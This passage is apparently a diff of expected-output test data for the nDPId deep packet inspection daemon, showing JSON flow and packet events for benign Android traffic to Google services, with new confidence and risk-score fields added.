-00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871075,"flow_last_seen":1582454871103,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454871103,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871042,"flow_last_seen":1582454871105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454871105,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01033{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871075,"flow_last_seen":1582454871103,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454871103,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01033{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871042,"flow_last_seen":1582454871105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454871105,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":221,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871115,"flow_last_seen":1582454871115,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1582454871115,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1582454871115,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454871115,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8q7VAAEARCZrAqAIQwKgCAZ6EADUAKMiehDwBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE="}
-00736{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871115,"flow_last_seen":1582454871115,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1582454871115,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871115,"flow_last_seen":1582454871115,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1582454871115,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1582454871117,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1582454871117,"pkt":"TGr2n\/YnxiwDYGpkCABFAABM2yQAAEARGhvAqAIBwKgCEAA1noQAOIeohDyBgAABAAEAAAAAA3d3dwZnb29nbGUDY29tAAABAAHADAABAAEAAADaAATY7yZ4"}
-00751{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":223,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871115,"flow_last_seen":1582454871117,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1582454871117,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}}
+00777{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":223,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871115,"flow_last_seen":1582454871117,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1582454871117,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1582454871128,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454871128,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA83d0AAGcGtfGtwk9ywKgCEABQj+ImKPRybuhwKaAS87giVwAAAgQFlgQCCArBhO\/i\/\/82yQEDAwg="}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1582454871130,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454871130,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0RuJAAEAGM\/XAqAIQrcJPco\/iAFBu6HApJij0c4AQAVdDYAAAAQEICv\/\/NtHBhO\/i"}
-00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871094,"flow_last_seen":1582454871131,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":74,"midstream":0,"ts_msec":1582454871131,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"},"http": {"hostname":"check.googlezip.net","url":"check.googlezip.net\/connect","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 9; Nokia 2.2) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/79.0.3945.93 Mobile Safari\/537.36"}}
-00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871075,"flow_last_seen":1582454871132,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"ts_msec":1582454871132,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871094,"flow_last_seen":1582454871131,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":74,"midstream":0,"ts_msec":1582454871131,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"},"http": {"hostname":"check.googlezip.net","url":"check.googlezip.net\/connect","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 9; Nokia 2.2) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/79.0.3945.93 Mobile Safari\/537.36"}}
+01074{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871075,"flow_last_seen":1582454871132,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"ts_msec":1582454871132,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1582454871132,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454871132,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8KYcAAHYGldms2RXKwKgCEAG7ytjkokMBL2I0XaAS6yDzNwAAAgQFZAQCCAptKuid\/\/82ywEDAwg="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1582454871135,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454871135,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0AphAAEAGstDAqAIQrNkVysrYAbsvYjRd5KJDAoAQAVcLdwAAAQEICv\/\/NtNtKuid"}
-00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871042,"flow_last_seen":1582454871135,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"ts_msec":1582454871135,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871103,"flow_last_seen":1582454871138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454871138,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"datasaver.googleapis.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01074{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871042,"flow_last_seen":1582454871135,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"ts_msec":1582454871135,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871103,"flow_last_seen":1582454871138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454871138,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"datasaver.googleapis.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":243,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871152,"flow_last_seen":1582454871152,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454871152,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1582454871152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454871152,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA82rlAAEAGneLAqAIQ2O8meIDkAbvMauxuAAAAAKAC\/\/8TjwAAAgQFtAQCCAr\/\/zbXAAAAAAEDAwg="}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1582454871166,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454871166,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA82hIAAHUGqYnY7yZ4wKgCEAG7gOSVNE5IzGrsb6AS6yB0TQAAAgQFZAQCCArIBAje\/\/821wEDAwg="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1582454871167,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454871167,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA02rpAAEAGnenAqAIQ2O8meIDkAbvMauxvlTROSYAQAVeMkAAAAQEICv\/\/NtvIBAje"}
-00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":250,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871103,"flow_last_seen":1582454871175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"ts_msec":1582454871175,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"datasaver.googleapis.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00812{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871152,"flow_last_seen":1582454871200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454871200,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
-00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871069,"flow_last_seen":1582454871207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454871207,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00871{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871152,"flow_last_seen":1582454871230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1598,"flow_avg_l4_payload_len":266,"midstream":0,"ts_msec":1582454871230,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
-01121{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":261,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871152,"flow_last_seen":1582454871230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2734,"flow_avg_l4_payload_len":390,"midstream":0,"ts_msec":1582454871230,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","server_names":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=www.google.com","alpn":"http\/1.1","fingerprint":"32:07:6C:9F:96:7D:CE:82:15:C6:C5:7B:49:90:53:A1:CF:80:4F:B0"}}
-00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":264,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871069,"flow_last_seen":1582454871237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"ts_msec":1582454871237,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00953{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":250,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871103,"flow_last_seen":1582454871175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"ts_msec":1582454871175,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"datasaver.googleapis.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
